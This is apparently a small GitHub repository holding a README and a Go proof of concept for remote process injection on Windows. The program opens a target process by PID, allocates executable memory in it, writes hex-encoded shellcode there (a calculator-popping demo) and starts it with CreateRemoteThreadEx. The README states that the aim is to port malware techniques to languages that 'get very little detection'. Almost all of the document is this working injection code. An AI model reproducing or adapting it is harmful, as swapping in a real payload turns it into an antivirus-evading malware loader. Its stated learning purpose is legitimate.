├── README.md
└── remoteInject.go


/README.md:
--------------------------------------------------------------------------------
1 | # GodeInjection
2 | 
3 | This repo is just to host my PoC for remote code injection using Golang and calling Windows API's. I showcased using these type of syscalls in my blog located [here](https://anubissec.github.io/How-To-Call-Windows-APIs-In-Golang/)
4 | 
5 | 
6 | I mainly made this for two reasons, to learn more about Go and to learn about how process injection actually worked. I like the idea of taking classic malware techniques and porting them to other languages that get very little detection (i.e. Golang, Nim, etc). 
7 | 
8 | I made this a while ago but am sharing it now in case anyone else will benefit from this.


--------------------------------------------------------------------------------
/remoteInject.go:
--------------------------------------------------------------------------------
 1 | // +build windows
 2 | package main
 3 | 
 4 | 
 5 | import (
 6 | 
 7 | 	
 8 | 	"unsafe"
 9 | 	"log"
10 | 	"encoding/hex"
11 | 	"flag"
12 | 	"fmt"
13 | 	
14 | 	"golang.org/x/sys/windows"
15 |  
16 | 
17 | )
18 | 
19 | func main() {
20 |  	pid := flag.Int("pid", 0, "Proc")
21 | 	flag.Parse() 
22 | 
23 | 
24 | 
25 | 	kernel32DLL	:= windows.NewLazySystemDLL("kernel32.dll")
26 | 
27 | 	WriteProcessMemory := kernel32DLL.NewProc("WriteProcessMemory")
28 | 	VirtualAllocEx := kernel32DLL.NewProc("VirtualAllocEx")
29 | 	VirtualProtectEx := kernel32DLL.NewProc("VirtualProtectEx")
30 | 	CreateRemoteThreadEx := kernel32DLL.NewProc("CreateRemoteThreadEx")
31 | 
32 | 
33 | 	// Get a handle on remote process
34 | 	pHandle, errProc := windows.OpenProcess(windows.PROCESS_CREATE_THREAD|windows.PROCESS_VM_OPERATION|windows.PROCESS_VM_WRITE|windows.PROCESS_VM_READ|windows.PROCESS_QUERY_INFORMATION, false, uint32(*pid))
35 | 	if errProc != nil {
36 | 		log.Fatal(fmt.Sprintf("[!]Error calling OpenProcess:\r\n%s", errProc.Error()))
37 | 	}
38 | 	//fmt.Println(fmt.Sprintf("[+] Successfully got a handle to process %d", *pid))
39 | 
40 | 	// Pop Calc (32 bit payload)
41 | 	//"505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3"
42 | 
43 | 	buf, bufErr := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3")
44 | 	if bufErr != nil {
45 | 
46 | 		log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", bufErr.Error()))
47 | 
48 | 	}
49 | 	//fmt.Println("[+] Successfully decoded payload")
50 | 
51 | 	// Get a pointer to the cave of code carved out in the remote process
52 | 	pRemoteCode, _, errVirtualAlloc := VirtualAllocEx.Call(uintptr(pHandle), 0, uintptr(len(buf)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)
53 | 	if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." {
54 | 		log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error()))
55 | 	}
56 | 	//fmt.Println(fmt.Sprintf("[+] Successfully allocated a region of memory in remote process %d", *pid))
57 | 
58 | 	// Write the payload into the code cave
59 | 	_, _, errWriteProcessMemory := WriteProcessMemory.Call(uintptr(pHandle), pRemoteCode, (uintptr)(unsafe.Pointer(&buf[0])), uintptr(len(buf)))
60 | 
61 | 	if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." {
62 | 		log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error()))
63 | 	}
64 | 	//fmt.Println(fmt.Sprintf("[+] Wrote the payload to process %d", *pid))
65 | 
66 | 
67 | 	oldProtect := windows.PAGE_READWRITE
68 | 	_, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(pHandle), pRemoteCode, uintptr(len(buf)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
69 | 	if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." {
70 | 		fmt.Printf("[!] Error on VirtualProtect:", errVirtualProtectEx, "\n")
71 | 	}
72 | 	//fmt.Println(fmt.Sprintf("[+] Successfully changed permissions to PAGE_EXECUTE_READ in PID %d", *pid))
73 | 
74 | 
75 | 
76 | 	 _, _, errCreate := CreateRemoteThreadEx.Call(uintptr(pHandle), 0, 0, pRemoteCode, 0, 0, 0)
77 | 	 	if errCreate != nil {
78 | 		fmt.Sprintf("[!] Error on CreateRemoteThread:", errCreate, "\n")
79 | 	}
80 | 	//fmt.Println("[+] Creating remote thread to execute shellcode")
81 | 
82 | 	
83 | 	errCloseHandle := windows.CloseHandle(pHandle)
84 | 	if errCloseHandle != nil {
85 | 		fmt.Printf("[!] Error on CLoseHandle:", errCloseHandle, "\n")
86 | 
87 | 	}
88 | 	//fmt.Println(fmt.Sprintf("[+] Closed handle on the processe %d", *pid))
89 | 
90 | }
91 | 


--------------------------------------------------------------------------------